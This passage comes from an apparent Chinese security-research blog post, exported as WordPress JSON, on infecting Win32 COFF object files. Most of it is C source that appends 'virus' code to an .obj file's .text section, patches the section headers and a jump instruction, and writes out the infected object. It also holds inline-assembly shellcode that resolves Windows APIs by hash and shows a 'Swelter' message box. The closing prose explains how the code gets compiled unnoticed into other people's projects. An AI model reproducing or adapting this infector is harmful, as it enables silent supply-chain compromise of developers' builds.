+ f_size :%0x\r\n\",buf + f_size);\r\n\tmemcpy(buf + f_size,buf + txt_off,txt_len);\r\n\r\n\t\/\/ copy\u91cd\u5b9a\u4f4d\u8868\r\n\tmemcpy(buf + f_size + txt_len,buf + tx_rel_off,tx_rel_len);\r\n\r\n\t\/\/ copy virus\r\n\tmemcpy(buf + f_size + txt_len + tx_rel_len,vir_code,vir_size);\r\n\r\n\t\/\/ \u4fee\u6539.text\u8282\u4ee3\u7801\u504f\u79fb\r\n\t\/\/sh.ul_sec_size\r\n\t(*(unsigned long *)(buf + tx_off + 8 + 4 + 4)) = txt_len + vir_size + 9;\r\n\t\/\/sh.ul_sec_off\r\n\t(*(unsigned long *)(buf + tx_off + 8 + 4 + 4 + 4)) = f_size;\r\n\r\n\t\/\/ \u4fee\u6539\u539f\u6709ret\u6307\u4ee4\uff0c\u8df3\u8fc7\u91cd\u5b9a\u4f4d\u8868\uff0c\u6b64\u5904\u9700\u8981\u53cd\u6c47\u7f16\u5f15\u64ce\u652f\u6301\uff0c\u641c\u7d220xc3\uff0c\u5b9a\u4f4d\u8981\u4fee\u6539\u7684jmp \u4f4d\u7f6e\uff0cPOC\u6f14\u793a\u76f4\u63a5\u5b9a\u4f4d.\r\n\r\n\t(*(unsigned char *)(buf + f_size + 0x0b)) = 0xeb;\r\n\t(*(unsigned long *)(buf + f_size + 0x0c)) = (txt_len - 0xc) + tx_rel_len - 1;\r\n\r\n\t\/\/ \u52a0\u5165ret\u6307\u4ee4\u8fd4\u56de\uff0c\u6216\u8df3\u8f6c\u4f1a\u5bbf\u4e3b\r\n\t\/\/ ...\r\n\r\n\t\/\/ \u5199\u5165\u4e00\u4e2a\u65b0\u7684obj\r\n\tif(0 ==(h = fopen(\"t_obj.obj\",\"wb\")))\r\n\t{\r\n\t\tprintf(\"the file t_obj.obj was not created\r\n\");\r\n\t\treturn 0;\r\n\t}\r\n\tfwrite(buf,sizeof(unsigned char),a_size,h);\r\n\tfclose(h);\r\n\treturn 1;\r\n}\r\n__declspec(naked) void vir_code(void)\r\n{\r\n\t_asm{\r\n\t\t\tnop\r\n\t\t\tnop\r\n\t\t\tnop\r\n\t\t\tnop\r\n\t\t\tnop\r\n\t\t\tnop\r\n\t\t\tnop\r\n\t\t\tnop\r\n\t\t\tnop\r\n\t\t\tCLD ; clear flag DF\r\n\t\t\t ;store hash\r\n\t\t\tpush 0x1e380a6a ;hash of MessageBoxA\r\n\t\t\tpush 0x4fd18963 ;hash of ExitProcess\r\n\t\t\tpush 0x0c917432 ;hash of LoadLibraryA\r\n\t\t\tmov esi,esp ; esi = addr of first function hash\r\n\t\t\tlea edi,[esi-0xc] ; edi = addr to start writing function\r\n\t\t\t; make some stack space\r\n\t\t\txor ebx,ebx\r\n\t\t\tmov bh, 0x04\r\n\t\t\tsub esp, ebx\r\n ; push a pointer to \"user32\" onto stack\r\n\t\t\tmov bx, 0x3233 ; rest of ebx is null\r\n\t\t\tpush ebx\r\n\t\t\tpush 0x72657375\r\n\t\t\tpush esp \r\n\r\n\t\t\txor edx,edx\r\n\t\t\t; find base addr of kernel32.dll\r\n\t\t\tmov ebx, fs:[edx + 0x30]\r\n\t\t\tmov ecx, [ebx + 0x0c]\r\n\t\t\tmov ecx, [ecx + 0x1c]\r\n\t\t\tmov ecx, [ecx]\r\n\t\t\tmov ebp, [ecx + 0x08]\r\n\t\tfind_lib_functions: \r\n\r\n\t\t\tlodsd\r\n\t\t\tcmp eax, 0x1e380a6a\t\t \r\n\r\n\t\t\tjne find_functions\r\n\t\t\txchg eax, ebp\r\n\t\t\tcall [edi - 0x8]\r\n\t\t\txchg eax, ebp \t\t\t \r\n\r\n\t\tfind_functions:\r\n\t\t\tpushad\r\n\t\t\tmov eax, [ebp + 0x3c]\r\n\t\t\tmov ecx, [ebp + eax + 0x78]\r\n\t\t\tadd ecx, ebp\r\n\t\t\tmov ebx, [ecx + 0x20]\r\n\t\t\tadd ebx, ebp\r\n\t\t\txor edi, edi \t\t\t\t \r\n\r\n\t\tnext_function_loop:\r\n\t\t\tinc edi\r\n\t\t\tmov esi, [ebx + edi * 4]\r\n\t\t\tadd esi, ebp\r\n\t\t\tcdq \t\t\t\t\t\t \r\n\r\n\t\thash_loop:\r\n\t\t\tmovsx eax, byte ptr[esi]\r\n\t\t\tcmp al,ah\r\n\t\t\tjz compare_hash\r\n\t\t\tror edx,7\r\n\t\t\tadd edx,eax\r\n\t\t\tinc esi\r\n\t\t\tjmp hash_loop\r\n\r\n\t\tcompare_hash:\r\n\t\t\tcmp edx, [esp + 0x1c]\r\n\t\t\tjnz next_function_loop \r\n\r\n\t\t\tmov ebx, [ecx + 0x24]\r\n\t\t\tadd ebx, ebp\r\n\t\t\tmov di, [ebx + 2 * edi]\r\n\t\t\tmov ebx, [ecx + 0x1c]\r\n\t\t\tadd ebx, ebp\r\n\t\t\tadd ebp, [ebx + 4 * edi] \r\n\r\n\t\t\txchg eax, ebp\r\n\t\t\tpop edi\r\n\t\t\tstosd\r\n\t\t\tpush edi\r\n\t\t\tpopad\r\n\t\t\tcmp eax,0x1e380a6a\r\n\t\t\tjne find_lib_functions \r\n\r\n\t\tfunction_call:\r\n\t\t\txor ebx,ebx\r\n\t\t\tpush ebx \/\/ cut string\r\n\t\t\tpush 0x00726574 \/\/ show Win32.Swelter\r\n\t\t\tpush 0x6C657753\r\n\t\t\tmov eax,esp \/\/load address of Swelter\r\n\t\t\tpush ebx\r\n\t\t\tpush eax\r\n\t\t\tpush eax\r\n\t\t\tpush ebx\r\n\t\t\tcall [edi - 0x04] \/\/call MessageboxA\r\n\t\t\tpush ebx\r\n\t\t\tcall [edi - 0x08] \/\/ call ExitProcess\r\n\t\t\tret\r\n\t}\r\n}\r\n__declspec(naked) void vir_code_end(void)\r\n{\r\n\r\n}\r\n\/\/------------------------------------------------------------------------------\r\n\r\n[0x06] .\u5176\u5b83\r\n\r\n \u5173\u4e8e\u611f\u67d3\u7684\u65b9\u5f0f\u8fd8\u6709\u5f88\u591a\u4e2d\u65b9\u6cd5\uff0c\u6bd4\u5982\u5229\u7528\u91cd\u5b9a\u4f4d\u8868\uff0c\u6784\u9020\u4e00\u4e2a\u52a0\u8f7d\u540e\u80fd\u8df3\u8f6c\u5230virus code\r\n\u503c\uff0c\u611f\u5174\u8da3\u7684\u670b\u53cb\u53ef\u4ee5\u53bb\u5c1d\u8bd5\u4e0b\uff0ccoff - obj\u7684\u611f\u67d3\u6761\u4ef6\u6bd4\u8f83\u82db\u523b\uff0c\u81f3\u5c11\u8981\u5728\u6709\u7f16\u8bd1\u5668\u7684\u673a\r\n\u5668\u4e0a\u641c\u7d22\u5230\u6709obj\u624d\u884c\uff0c\u5e76\u4e14\u6ca1\u6709\u505arebuild all \u64cd\u4f5c\uff0c\u800c\u662f\u76f4\u63a5\u7f16\u8bd1\u94fe\u63a5\u4ee3\u7801\uff0c\u8fd9\u6837\u624d\u4f1a\u795e\r\n\u4e0d\u77e5\u9b3c\u4e0d\u89c9\u7684\u628a\u75c5\u6bd2\u4ee3\u7801\u7f16\u8bd1\u8fdb\u81ea\u5df1\u7684\u5de5\u7a0b\u91cc\u9762\u6765\u3002\r\n\r\n \u7531\u4e8e\u5bf9\u94fe\u63a5\u5668\u539f\u7406\u7406\u89e3\u4e0d\u591f\u6df1\u5165\u53ca\u5bf9coff\u6587\u4ef6\u683c\u5f0f\u672c\u8eab\u7406\u89e3\u4e0d\u51c6\u7684\u5730\u65b9\u53ef\u80fd\u5bfc\u81f4\u672c\u6587\u5b58\r\n\u5728\u63cf\u8ff0\u4e2d\u5b58\u5728\u758f\u6f0f\uff0c\u5982\u679c\u6709\u4ec0\u4e48\u95ee\u9898\u7ed9mail\u6211\uff0cneineit@gmail.com\uff0c\u6b22\u8fce\u4ea4\u6d41\u6307\u6b63\u3002\r\n\r\n\u9644\u53c2\u8003\u6587\u732e\uff1a\r\n\r\n[1] Matt Pietrek. \u300aLinker Algorithm\u300b\r\n[2] John R. Levine. \u300aLinkers & Loaders\u300b\r\n[3] coff \u683c\u5f0f. http:\/\/baike.baidu.com\/view\/1240794.htm\r\n[4] failwest. \u300ashellcode_popup_general\u300b<\/pre>\n

-EOF-<\/pre>\n","protected":false},"excerpt":{"rendered":"Win32 coff-obj\u6587\u4ef6\u611f\u67d3\u6280\u672f\u7814\u7a76 By nEINEI [\u76ee\u5f55] [0 …<\/p>\n\u7ee7\u7eed\u9605\u8bfb »<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[160,159],"class_list":["post-404","post","type-post","status-publish","format-standard","hentry","tag-coff-obj","tag-win32"],"views":822,"_links":{"self":[{"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/posts\/404","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/comments?post=404"}],"version-history":[{"count":0,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/posts\/404\/revisions"}],"wp:attachment":[{"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/media?parent=404"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/categories?post=404"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/tags?post=404"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}